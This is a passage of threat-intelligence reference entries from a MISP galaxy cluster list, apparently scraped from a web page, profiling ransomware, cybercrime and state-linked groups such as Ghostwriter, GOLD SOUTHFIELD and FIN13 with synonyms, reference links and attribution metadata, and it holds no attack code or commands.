- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 100 |
country | CN |
Related clusters
RedEcho
RedEcho: The group made heavy use of AXIOMATICASYMPTOTE — a term we use to track infrastructure that comprises ShadowPad C2s, which is shared between several Chinese threat activity groups
Internal MISP references
UUID 986fcc3f-5f36-4975-bf5f-c42524466bbd
which can be used as unique global reference for RedEcho
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Ghostwriter
Ghostwriter is referred to as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghostwriter.
Known Synonyms |
---|
DEV-0257 |
PUSHCHA |
Storm-0257 |
TA445 |
UAC-0057 |
UNC1151 |
Internal MISP references
UUID 749aaa11-f0fd-416b-bf6c-112f9b5930a5
which can be used as unique global reference for Ghostwriter
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2020/07/ghostwriter-influence-campaign.html - webarchive
- https://twitter.com/hatr/status/1377220336597483520 - webarchive
- https://www.mandiant.com/resources/unc1151-linked-to-belarus-government - webarchive
- https://www.bleepingcomputer.com/news/security/meta-ukrainian-officials-military-targeted-by-ghostwriter-hackers - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://socprime.com/blog/uac-0057-attack-detection-a-surge-in-adversary-activity-distributing-picassoloader-and-cobalt-strike-beacon/ - webarchive
- https://socprime.com/blog/picassoloader-and-cobalt-strike-beacon-detection-uac-0057-aka-ghostwriter-hacking-group-attacks-the-ukrainian-leading-military-educational-institution/ - webarchive
- https://cert.gov.ua/article/5098518 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Belarus |
cfr-suspected-victims | ['Germany', 'Latvia', 'Lithuania', 'Poland', 'Ukraine'] |
cfr-target-category | ['Government'] |
country | BY |
Related clusters
Yanbian Gang
RiskIQ characterizes the Yanbian Gang as a group that targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, Shinhan Finance, KB Kookmin Bank, and NH Savings Bank.
Internal MISP references
UUID eaeae8e9-cc4b-4be8-82fd-8edc65ff9a5e
which can be used as unique global reference for Yanbian Gang
in MISP communities and other software using the MISP galaxy
External references
- https://www.riskiq.com/blog/external-threat-management/yanbian-gang-malware-distribution/ - webarchive
- https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html - webarchive
- https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html - webarchive
- https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-malware-gang-steals-millions-from-south-korean-users/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['South Korea', 'Japan'] |
TRAVELING SPIDER
CrowdStrike tracks the criminal developer of Nemty ransomware as TRAVELING SPIDER. The actor has been observed taking advantage of single-factor authentication to gain access to victim organizations through Citrix Gateway and sending extortion-related emails using the victim's own Microsoft Office 365 instance.
Internal MISP references
UUID a515632e-3374-4602-911e-4f4e259ae0fd
which can be used as unique global reference for TRAVELING SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MALLARD SPIDER
CrowdStrike tracks the operators behind Qbot as MALLARD SPIDER.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MALLARD SPIDER.
Known Synonyms |
---|
GOLD LAGOON |
Internal MISP references
UUID 08f4bfa6-8326-42b5-a9e2-d6e1c360a160
which can be used as unique global reference for MALLARD SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RIDDLE SPIDER
According to CrowdStrike, RIDDLE SPIDER is the operator behind the Avaddon ransomware.
Internal MISP references
UUID 090d0553-cdcf-4f4e-ae3b-b5d751acaf5d
which can be used as unique global reference for RIDDLE SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD DUPONT
GOLD DUPONT is a financially motivated cybercriminal threat group that specializes in post-intrusion ransomware attacks using 777 (aka Defray777 or RansomExx) malware. Active since November 2018, GOLD DUPONT establishes initial access into victim networks using stolen credentials to remote access services like virtual desktop infrastructure (VDI) or virtual private networks (VPN). From October 2019 to early 2020 the group used GOLD BLACKBURN's TrickBot malware as an initial access vector (IAV) during some intrusions. Since July 2020, the group has also used GOLD SWATHMORE's IcedID (Bokbot) malware as an IAV in some intrusions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD DUPONT.
Known Synonyms |
---|
SPRITE SPIDER |
Internal MISP references
UUID 3570552c-c46f-428e-9472-744a14e6ece7
which can be used as unique global reference for GOLD DUPONT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SOLAR SPIDER
SOLAR SPIDER’s phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.
Internal MISP references
UUID f65103ad-f051-47c3-b90e-c77239a4d65c
which can be used as unique global reference for SOLAR SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Finance'] |
VIKING SPIDER
VIKING SPIDER is the criminal group behind the development and distribution of Ragnar Locker ransomware. While public reporting indicates the group began threatening to leak victim data in February 2020, a DLS was not observed until April 2020. The DLS is hosted on Tor, and, similar to other actors, proof of data exfiltration is provided before the stolen data is fully leaked. It was also noted that on Dec. 22, 2020, a new post made to MountLocker ransomware's Tor-hosted DLS was titled 'Cartel News' and included details of a victim of VIKING SPIDER's Ragnar Locker.
Internal MISP references
UUID ffc02459-3d94-4558-bff0-2e7f0bbf70c6
which can be used as unique global reference for VIKING SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/ - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
CIRCUS SPIDER
According to CrowdStrike, the NetWalker ransomware is being developed and maintained by a Russian-speaking actor designated as CIRCUS SPIDER. Initially discovered in September 2019 and having a compilation timestamp dating back to 28 August 2019, NetWalker has been found to be used in Big Game Hunting (BGH)-style operations while also being distributed via spam. CIRCUS SPIDER is advertising NetWalker as a closed-affiliate program, and verifies applicants before they are accepted as affiliates. The requirements range from providing proof of previous revenue in similar affiliate programs, to experience in the field, to what type of industry the applicant is targeting.
Internal MISP references
UUID 3ebf503c-c554-4ac3-aa3e-3ef114ca2345
which can be used as unique global reference for CIRCUS SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
GOLD EVERGREEN
GOLD EVERGREEN was a financially motivated cybercriminal threat group that operated the Gameover Zeus (aka Mapp, P2P Zeus) botnet until June 2014. It encompasses an expansive and long running criminal conspiracy operated by a confederation of individuals calling themselves The Business Club from the mid 2000s until 2014. GOLD EVERGREEN's technical operation was facilitated primarily through botnets using the Zeus, JabberZeus, and eventually Gameover Zeus malware families. These malware families were designed and maintained by a Russian national Evgeniy Bogachev (aka 'slavik') who was indicted by the U.S. DOJ in 2014 and remains a fugitive.
Internal MISP references
UUID fc1c1d9f-1432-417f-a3bf-e730ddd1d139
which can be used as unique global reference for GOLD EVERGREEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BAMBOO SPIDER
CrowdStrike tracks the developer of Panda Zeus as BAMBOO SPIDER.
Internal MISP references
UUID 419599eb-c1ea-4d32-8c9e-0ad61d7c5ba5
which can be used as unique global reference for BAMBOO SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BOSON SPIDER
BOSON SPIDER is a cybercriminal group that was first identified in 2015 and recently, in the spring of 2016, inexplicably went dark. It appears to be a tightly knit group operating out of Eastern Europe. They have used a variety of distribution mechanisms, such as the infamous (and now defunct) Angler exploit kit, and obfuscated JavaScript to reduce detection by antivirus solutions.
Internal MISP references
UUID 9c11a822-2239-42ca-a439-ee57edb44ebf
which can be used as unique global reference for BOSON SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OVERLORD SPIDER
OVERLORD SPIDER, aka The Dark Overlord. Similar to ransomware operators today, OVERLORD SPIDER likely purchased RDP access to compromised servers on underground forums in order to exfiltrate data from corporate networks. The actor was known to attempt to “sell back” the data to the respective victims, threatening to sell the data to interested parties should the victim refuse to pay. There was at least one identified instance of OVERLORD SPIDER successfully selling victim data on an underground market.
Internal MISP references
UUID b43ce229-feaa-4731-9926-e0970140ab0b
which can be used as unique global reference for OVERLORD SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OUTLAW SPIDER
On May 7, 2019, Mayor Bernard "Jack" Young confirmed that the network for the U.S. City of Baltimore (CoB) was infected with ransomware, which was announced via Twitter. This infection was later confirmed to have been conducted by OUTLAW SPIDER, which is the actor behind the RobbinHood ransomware. The actor demanded to be paid 3 BTC (approximately $17,600 USD at the time) per infected system, or 13 BTC (approximately $76,500 USD at the time) for all infected systems, to recover the city's files.
Internal MISP references
UUID ae121063-3960-4834-90d7-66aad69c5e8b
which can be used as unique global reference for OUTLAW SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/ - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeServicesCyberFrontLines.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Government, Administration'] |
MIMIC SPIDER
MIMIC SPIDER is mentioned in two summary reports only.
Internal MISP references
UUID 20e2be89-a54d-46c7-a837-1f17359f30ba
which can be used as unique global reference for MIMIC SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
HOUND SPIDER
According to CrowdStrike, HOUND SPIDER affiliates were arrested in Romania in December 2017.
Internal MISP references
UUID 22dd1608-272c-4243-9bda-25eec834a24d
which can be used as unique global reference for HOUND SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD BURLAP
GOLD BURLAP is a group of financially motivated criminals responsible for the development of the Pysa ransomware, also referred to as Mespinoza. Pysa is a cross-platform ransomware with known versions written in C++ and Python. As of December 2020, approximately 50 organizations had reportedly been targeted in Pysa ransomware attacks. The operators leverage 'name and shame' tactics to apply additional pressure to victims. As of January 2021, CTU researchers had found no Pysa advertisements on underground forums, which likely indicates that it is not operated as ransomware as a service (RaaS).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD BURLAP.
Known Synonyms |
---|
CYBORG SPIDER |
Internal MISP references
UUID d34ca487-1613-4ee5-8930-2ac8a60f945f
which can be used as unique global reference for GOLD BURLAP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Healthcare'] |
Related clusters
GOLD CABIN
GOLD CABIN is a financially motivated cybercriminal threat group operating a malware distribution service on behalf of numerous customers since 2018. GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD CABIN.
Known Synonyms |
---|
ATK236 |
G0127 |
Monster Libra |
Shakthak |
TA551 |
Internal MISP references
UUID 36e8c848-4d20-47ea-9fc2-31aa17bf82d1
which can be used as unique global reference for GOLD CABIN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD FAIRFAX
GOLD FAIRFAX is a financially motivated cybercriminal threat group responsible for the creation, distribution, and operation of the Ramnit botnet. Ramnit, the phonetic spelling of RMNet, the internal name of the core module, began operation in April 2010 and became widespread in July 2010. A particularly virulent file-infecting component of early Ramnit variants that spreads by modifying executables and HTML files has resulted in the continued prevalence of those early variants. Currently, Ramnit remains an actively maintained and distributed threat. The intent of Ramnit is to intercept and manipulate online financial transactions through modification of web browser behavior ('man-in-the-browser').
Internal MISP references
UUID eadc8c5c-a97d-454e-8e67-475ac60749bf
which can be used as unique global reference for GOLD FAIRFAX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD FLANDERS
GOLD FLANDERS is a financially motivated group responsible for distributed denial of service (DDoS) attacks linked to extortion emails demanding between 5 and 30 bitcoins. The attacks consist mostly of fragmented UDP packets (DNS and NTP reflection) as well as other traffic that can vary per victim. The arrival of the extortion email is timed to coincide with a DDoS attack consisting of traffic between 20 Gbps and 200 Gbps and 12-15 million packets per second, lasting between 20 and 70 minutes, targeted at a particular Autonomous System Number (ASN) or group of IP addresses. In some cases victim organisations have replied to these extortion emails and received personal replies from GOLD FLANDERS operators within 20 minutes.
Internal MISP references
UUID 20180cbb-27e3-49d5-922e-1e3bddc6c085
which can be used as unique global reference for GOLD FLANDERS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD GALLEON
GOLD GALLEON is a financially motivated cybercriminal threat group comprised of at least 20 criminal associates that collectively carry out business email compromise (BEC) and spoofing (BES) campaigns. The group appears to specifically target maritime organizations and their customers. CTU researchers have observed GOLD GALLEON targeting firms in South Korea, Japan, Singapore, Philippines, Norway, U.S., Egypt, Saudi Arabia, and Colombia. The threat actors leverage tools, tactics, and procedures that are similar to those used by other BEC/BES groups CTU researchers have previously investigated, such as GOLD SKYLINE. The groups have used the same caliber of publicly available malware (inexpensive and commodity remote access trojans), crypters, and email lures.
Internal MISP references
UUID 6976b33c-a45b-4330-b0d8-8ef029ef830e
which can be used as unique global reference for GOLD GALLEON
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD GARDEN
GOLD GARDEN was a financially motivated cybercriminal threat group that authored and operated the GandCrab ransomware from January 2018 through May 2019. GandCrab was operated as a ransomware-as-a-service operation whereby numerous affiliates distributed the malware and split ransom payments with the core operators. GOLD GARDEN maintained exclusive control of the development of GandCrab and associated command and control (C2) infrastructure. Individual affiliates, of which there were frequently more than a dozen in operation simultaneously, coordinated the distribution of GandCrab through spam emails, web exploit kits, pay-per-install botnets, and scan-and-exploit style attacks. On May 31, 2019 the operators announced they had halted operations with no intent to resume, for unknown reasons. In April 2019 the operators of GOLD GARDEN transferred the source code of GandCrab to GOLD SOUTHFIELD, who used it as the foundation of the REvil ransomware operation. GOLD SOUTHFIELD operates a similar affiliate program comprised largely of former GandCrab users and other groups recruited from underground forums.
Internal MISP references
UUID c0f86de9-888e-42b0-90f4-f313808533ff
which can be used as unique global reference for GOLD GARDEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD MANSARD
GOLD MANSARD is a financially motivated cybercriminal threat group that operated the Nemty ransomware from August 2019. The threat actor behind Nemty is known on Russian underground forums as 'jsworm'. Nemty was operated as a ransomware as a service (RaaS) affiliate program and featured a 'name and shame' website where exfiltrated victim data was leaked. In April 2020, jsworm appeared to acquire new partners and retired the Nemty ransomware. This was followed by the introduction of Nefilim ransomware, which does not operate as an affiliate model. Nefilim has been used in post-intrusion ransomware attacks against organizations in logistics, telecommunications, energy and other sectors.
Internal MISP references
UUID bda575ed-5066-4625-98ef-938bbffddc00
which can be used as unique global reference for GOLD MANSARD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD NORTHFIELD
Operational since at least October 2020, GOLD NORTHFIELD is a financially motivated cybercriminal threat group that leverages GOLD SOUTHFIELD's REvil ransomware in their attacks. To do this, the threat actors replace the configuration of the REvil ransomware binary with their own in an effort to repurpose the ransomware for their operations. GOLD NORTHFIELD has given this modified REvil ransomware variant the name 'LV ransomware'.
Internal MISP references
UUID 4c51f24c-90a1-4f22-b932-bd4bb9d488f6
which can be used as unique global reference for GOLD NORTHFIELD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD RIVERVIEW
GOLD RIVERVIEW was a financially motivated cybercriminal group that facilitated the distribution of malware- and scam-laden spam email on behalf of its customers. This threat group authored and sold the Necurs rootkit beginning in early 2014, including to GOLD EVERGREEN, who integrated it into Gameover Zeus. GOLD RIVERVIEW also operated a global botnet that was colloquially known as Necurs (CraP2P) and was a major source of spam email from 2016 through 2018. Necurs distributed malware such as GOLD DRAKE's Dridex (Bugat v5), GOLD BLACKBURN's TrickBot, and other families like Locky and FlawedAmmyy. Necurs also distributed a large volume of email pushing securities 'pump and dump' scams, rogue pharmacies, and fraudulent dating sites. On March 4, 2019 all three active segments of the Necurs botnet ceased operation and have not since resumed. On March 10, 2020 Microsoft took civil action against GOLD RIVERVIEW and took technical steps that would complicate the threat actors' ability to reconstitute the botnet.
Internal MISP references
UUID 3806516d-151b-4869-88bc-1f2a2cb73c3c
which can be used as unique global reference for GOLD RIVERVIEW
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD SKYLINE
GOLD SKYLINE is a financially motivated cybercriminal threat group operating from Nigeria engaged in high-value wire fraud facilitated by business email compromise (BEC) and spoofing (BES). Also known as Wire-Wire Group 1 (WWG1), GOLD SKYLINE has been active since at least 2016 and relies heavily on compromised email accounts, social engineering, and increasingly malware to divert inter-organization funds transfers.
Internal MISP references
UUID dcb6b056-7a1b-484c-82ee-f3962d47bcd9
which can be used as unique global reference for GOLD SKYLINE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD SOUTHFIELD
GOLD SOUTHFIELD is a financially motivated cybercriminal threat group that authors and operates the REvil (aka Sodinokibi) ransomware on behalf of various affiliated threat groups. Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. GOLD SOUTHFIELD is responsible for authoring REvil and operating the backend infrastructure used by affiliates (also called partners) to create malware builds and to collect ransom payments from victims. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates.
Internal MISP references
UUID 262c8537-1cdb-4297-aa3e-1410164160bf
which can be used as unique global reference for GOLD SOUTHFIELD
in MISP communities and other software using the MISP galaxy
External references
- http://www.secureworks.com/research/threat-profiles/gold-southfield - webarchive
- https://www.secureworks.com/research/revil-sodinokibi-ransomware - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- https://www.secureworks.com/blog/revil-the-gandcrab-connection - webarchive
Associated metadata
Metadata key | Value |
---|---|
GOLD SYMPHONY
GOLD SYMPHONY is a financially motivated cybercrime group, likely based in Russia, that is responsible for the development and sale on underground forums of the Buer Loader malware. First discovered around August 2019, Buer Loader is offered as a malware-as-a-service (MaaS) and has been advertised by a threat actor using the handle 'memeos'. Customers include GOLD BLACKBURN, the operators of the TrickBot malware. In addition to TrickBot, Buer Loader has been reported to download Cobalt Strike and other tools for use in post-intrusion ransomware attacks.
Internal MISP references
UUID bf151740-b667-4f06-87a1-131c3261cca2
which can be used as unique global reference for GOLD SYMPHONY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD WATERFALL
GOLD WATERFALL is a group of financially motivated cybercriminals responsible for the creation, distribution, and operation of the Darkside ransomware. Active since August 2020, GOLD WATERFALL uses a variety of tactics, techniques, and procedures (TTPs) to infiltrate and move laterally within targeted organizations to deploy Darkside ransomware to its most valuable resources. Among these TTPs are using malicious documents delivered by email to establish a foothold and using stolen credentials to access victims' remote access services. In November 2020, the 'darksupp' persona was observed advertising an affiliate program on several semi-exclusive underground forums, marking GOLD WATERFALL's entry into the ransomware-as-a-service (RaaS) landscape.
Internal MISP references
UUID 4d787c58-2581-4696-ad6c-e0e36ed2bac7
which can be used as unique global reference for GOLD WATERFALL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GOLD WINTER
GOLD WINTER is a financially motivated group, likely based in Russia, that operates the Hades ransomware. Hades activity was first identified in December 2020, and its absence from underground forums and marketplaces leads CTU researchers to conclude that it is not operated under a ransomware-as-a-service affiliate model. GOLD WINTER does employ name-and-shame tactics, in which data is stolen and used as additional leverage over victims, but rather than a single centralized leak site, CTU researchers have observed the group using Tor sites customized for each victim that include a Tox chat ID for communication, which also appears to be unique to each victim.
Internal MISP references
UUID 6c514d9d-e2fa-45a5-a938-9a461f69ad2d
which can be used as unique global reference for GOLD WINTER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BackdoorDiplomacy
An APT group that we are calling BackdoorDiplomacy, due to the main vertical of its victims, has been targeting Ministries of Foreign Affairs and telecommunication companies in Africa and the Middle East since at least 2017.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BackdoorDiplomacy.
Known Synonyms |
---|
BackDip |
CloudComputating |
Quarian |
Internal MISP references
UUID 6472be4d-c186-4c86-b3b7-7dc1b4d3a3d8
which can be used as unique global reference for BackdoorDiplomacy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Libya', 'Namibia', 'Sudan', 'Albania', 'Croatia', 'Georgia', 'Poland', 'Iran', 'Qatar', 'Saudi Arabia', 'Sri Lanka', 'Uzbekistan'] |
cfr-target-category | ['Government', 'Telecomms'] |
Gelsemium
The Gelsemium group has been active since at least 2014 and was described in the past by a few security companies. Gelsemium’s name comes from one possible translation ESET found while reading a report from VenusTech, who dubbed the group 狼毒草 for the first time. It’s the name of a genus of flowering plants belonging to the family Gelsemiaceae; Gelsemium elegans is the species that contains toxic compounds like Gelsemine, Gelsenicine and Gelsevirine, which ESET chose as names for the three components of this malware family.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gelsemium.
Known Synonyms |
---|
狼毒草 |
Internal MISP references
UUID 2dd31182-bae1-48ed-8bb3-805a3df89783
which can be used as unique global reference for Gelsemium
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/ - webarchive
- https://www.venustech.com.cn/uploads/2018/08/231401512426.pdf - webarchive
- https://hitcon.org/2016/pacific/0composition/pdf/1202/1202%20R0%200930%20an%20intelligance-driven%20approach%20to%20cyber%20defense.pdf - webarchive
- https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['North Korea', 'South Korea', 'Japan', 'China', 'Mongolia', 'Egypt', 'Saudi Arabia', 'Yemen', 'Oman', 'Iran', 'Iraq', 'Kuwait', 'Israel', 'Jordan', 'Gaza', 'Syria', 'Turkey', 'Lebanon'] |
cfr-target-category | ['Government', 'Electronics Manufacturers', 'Universities', 'Religious organization'] |
BelialDemon
Mentioned as the operator of TriumphLoader and Matanbuchus.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BelialDemon.
Known Synonyms |
---|
Matanbuchus |
Internal MISP references
UUID e7aff414-fc21-43eb-ad5d-9a46e07be9f5
which can be used as unique global reference for BelialDemon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Common Raven
Threat actor Common Raven has been actively targeting financial sector institutions, compromising their SWIFT payment infrastructure to send out fraudulent payments.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Common Raven.
Known Synonyms |
---|
DESKTOP-GROUP |
NXSMS |
OPERA1ER |
Internal MISP references
UUID da581c60-7c3d-4de6-b54c-cafea1c58389
which can be used as unique global reference for Common Raven
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
FIN13
Since 2017, Mandiant has been tracking FIN13, an industrious and versatile financially motivated threat actor conducting long-term intrusions in Mexico with an activity timeframe stretching back as early as 2016. Although their operations continue through the present day, in many ways FIN13's intrusions are like a time capsule of traditional financial cybercrime from days past. Instead of today's prevalent smash-and-grab ransomware groups, FIN13 takes their time to gather information to perform fraudulent money transfers. Rather than relying heavily on attack frameworks such as Cobalt Strike, the majority of FIN13 intrusions involve heavy use of custom passive backdoors and tools to lurk in environments for the long haul.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN13.
Known Synonyms |
---|
Elephant Beetle |
TG2003 |
Internal MISP references
UUID 60fa684d-c738-4b77-98fb-3f6605e2bb82
which can be used as unique global reference for FIN13
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/fin13-cybercriminal-mexico - webarchive
- https://blog.sygnia.co/elephant-beetle-an-organized-financial-theft-operation - webarchive
- https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf - webarchive
- https://www.netwitness.com/wp-content/uploads/FIN13-Elephant-Beetle-NetWitness.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
SideCopy
The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.
Internal MISP references
UUID f6d02ac3-3447-4892-b844-1ef31839e04f
which can be used as unique global reference for SideCopy
in MISP communities and other software using the MISP galaxy
External references
- https://www.seqrite.com/blog/operation-sidecopy/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure/ - webarchive
- https://www.telsy.com/sidecopy-apt-from-windows-to-nix/ - webarchive
- https://blog.talosintelligence.com/2021/07/sidecopy.html - webarchive
- https://about.fb.com/news/2021/11/taking-action-against-hackers-in-pakistan-and-syria/ - webarchive
- https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | PK |
Antlion
Antlion is a Chinese state-backed advanced persistent threat (APT) group that has been targeting financial institutions in Taiwan. This persistent campaign has lasted over the course of at least 18 months.
Internal MISP references
UUID 8482f350-867c-11ec-a8a3-0242ac120002
which can be used as unique global reference for Antlion
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Taiwan'] |
cfr-target-category | ['Financial'] |
country | CN |
TA2541
Persistent cybercrime threat actor targeting aviation, aerospace, transportation, manufacturing, and defense industries for years. This threat actor consistently uses remote access trojans (RATs) that can be used to remotely control compromised machines. This threat actor uses consistent themes related to aviation, transportation, and travel. The threat actor has used similar themes and targeting since 2017.
Internal MISP references
UUID a57e5bf5-d7f4-43a1-9c15-8a44cdb95079
which can be used as unique global reference for TA2541
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA516
This actor typically distributes instances of the SmokeLoader intermediate downloader, which, in turn, downloads additional malware of the actor’s choice, often banking Trojans. Figure 3 shows a lure document from a November campaign in which TA516 distributed fake resumes with malicious macros that, if enabled, launch a PowerShell script that downloads SmokeLoader. In this instance, we observed SmokeLoader downloading a Monero coinminer. Since the middle of 2017, TA516 has used similar macro-laden documents as well as malicious JavaScript hosted on Google Drive to distribute both Panda Banker and a coinminer executable via SmokeLoader, often in the same campaigns.
Internal MISP references
UUID 0466bbf1-a187-4b3d-b558-a31e5ca11ea7
which can be used as unique global reference for TA516
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA547
TA547 is responsible for many other campaigns since at least November 2017. The other campaigns by the actor were often localized to countries such as Australia, Germany, the United Kingdom, and Italy. Delivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.
Internal MISP references
UUID 29fbc8d4-1e6e-4edc-9887-bdf47f36e4c1
which can be used as unique global reference for TA547
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA554
